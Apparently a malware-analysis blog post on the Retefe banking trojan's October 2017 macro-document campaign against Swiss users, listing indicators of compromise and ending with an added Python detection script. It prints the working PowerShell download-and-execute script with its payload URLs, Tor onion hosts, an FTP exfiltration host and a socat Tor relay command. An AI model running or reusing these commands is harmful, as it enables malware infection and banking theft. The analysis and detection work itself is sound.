There is a change in the spreading strategy of Retefe Banking Trojan in October 2017 while targeting Swiss users.
Earlier, in September 2017, we observed it being spread through LNK files embedded in the documents. You can refer to my previous blog on it here.
Attack Flow in September 2017 -> Doc -> LNK -> powershell -> Retefe
However, in the second week of October 2017, it is being spread through Macro based Documents:
Attack flow in October 2017 -> Doc -> Macro -> powershell -> Retefe
Filename Patterns for the Documents sent in the campaign:
Dokument_<digits>_mm_dd_yyyy.doc
The Document displays a warning in German which prompts the user to enable macros in order to view the Document contents as shown in Figure 1.
Figure 1
Execution Flow
At first, the macro launches PowerShell to download the payload from one of the following URLs:
hxxp://sergiocarfagna.it/uibojvr.exe
hxxp://abdulhamit.org/aqdbgpg.exe
hxxp://areanuova.it/mbahhhd.exe
hxxp://venturadatacom.com/vrqgpao.exe
hxxp://centralbaptistchurchnj.org/wruaoud.exe
Below is the relevant PowerShell script which does this:
powershell -WindowStyle Hidden
    $webclient = new-object System.Net.WebClient;
    $myurls = 'hxxp://sergiocarfagna.it/uibojvr.exe,hxxp://abdulhamit.org/aqdbgpg.exe,hxxp://areanuova.it/mbahhhd.exe,hxxp://venturadatacom.com/vrqgpao.exe,hxxp://centralbaptistchurchnj.org/wruaoud.exe'.Split(',');
    $path = $env:temp + '\65536.exe';
    foreach($myurl in $myurls){
        try{
            $webclient.DownloadFile($myurl.ToString(), $path);   # fetch the payload into %temp%\65536.exe
            Start-Process $path;                                 # execute it
            break;                                               # stop after the first URL that succeeds
        }catch{}                                                 # a failed download is ignored and the next URL is tried
    }
The downloaded payload is then executed by Powershell.
In our case, the MD5 hash of the downloaded payload is: 6233e426bd6ade588463d268897f813b
Indicators of Compromise
1. Drops a JavaScript file in the path: C:\ProgramData\<random_name>.<random_extension>
Below are the details of the config file used by the JavaScript:
Tor Servers: dl: ["igs67efmlcucq57u.onion","jotetnnmfzb42sdw.onion","ou47twzxgnicn7ga.onion","aulqkm5upaqmto3i.onion"]
cert: A Comodo-signed certificate with the serial number: 00 ff 66 fa 4e 0b 64 80 0e
ps: Certificate installation script
pstp: Base64-encoded PowerShell script which installs Tor and Socat.
pslog: Base64-encoded PowerShell script which collects information about the machine and uploads it via FTP to the attacker's server: ftp.liwest.at/logs
Once again, we do not observe use of the EternalBlue exploit, and there is no pseb section inside the config section of the JavaScript.
3. Drops the file Microsoft.Win32.TaskScheduler.dll in the path: %temp%\<random_name>\
This DLL is leveraged by the PowerShell script to set up a scheduled task.
4. Drops a PowerShell script in the path: C:\ProgramData\<random_name>.ps1
This PowerShell script sets up the scheduled task, which executes both Tor and Socat to set up the SOCKS proxy as shown below:
socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050
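As an added detection example (not part of the original post), the Python below turns the execution flow described above into three rules and runs them over constructed Sysmon-style process-creation records: an Office parent spawning a hidden PowerShell downloader, PowerShell running a dropped script out of C:\ProgramData, and socat relaying to a .onion address over SOCKS4A. The record field names and the sample events are constructed for illustration.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;"
                "$path = $env:temp + '\\65536.exe';$webclient.DownloadFile($myurl.ToString(), $path);"
                "Start-Process $path"},
    {"parent": "powershell.exe", "image": "socat.exe",
     "cmdline": "socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 "
                "SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050"},
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\qzrtvh.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",   # benign admin script, must not fire
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

RULES = {
    # Macro -> hidden PowerShell that downloads into %temp% and starts the file.
    "office_spawns_ps_downloader": lambda e: (
        e["parent"].lower() in OFFICE_PARENTS
        and e["image"].lower() == "powershell.exe"
        and re.search(r"-w(indowstyle)?\s+hidden", e["cmdline"], re.I) is not None
        and "DownloadFile(" in e["cmdline"]
        and re.search(r"start-process", e["cmdline"], re.I) is not None
    ),
    # socat listening on loopback and relaying to a .onion host through the local Tor SOCKS port.
    "socat_tor_socks_relay": lambda e: (
        e["image"].lower() == "socat.exe"
        and re.search(r"tcp4?-listen:\d+,.*bind=127\.0\.0\.1", e["cmdline"], re.I) is not None
        and re.search(r"socks4a?:127\.0\.0\.1:[a-z2-7]{16,56}\.onion", e["cmdline"], re.I) is not None
    ),
    # PowerShell executing a dropped .ps1 directly from C:\ProgramData.
    "ps_script_from_programdata": lambda e: (
        e["image"].lower() == "powershell.exe"
        and re.search(r"C:\\ProgramData\\[^\\\s]+\.ps1", e["cmdline"], re.I) is not None
    ),
}

def classify(event):
    """Return the names of every rule the event matches (empty list if none)."""
    return [name for name, check in RULES.items() if check(event)]

def scan(events):
    """Return (index, matched_rules) for each event that fires at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(rules)}")
```

The rules key on the behaviours the post describes (hidden-window download-and-execute from an Office parent, the loopback socat relay to Tor, and scripts run from ProgramData), so they are not tied to the specific URLs or file names of this campaign.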
MD5 hashes of the Documents: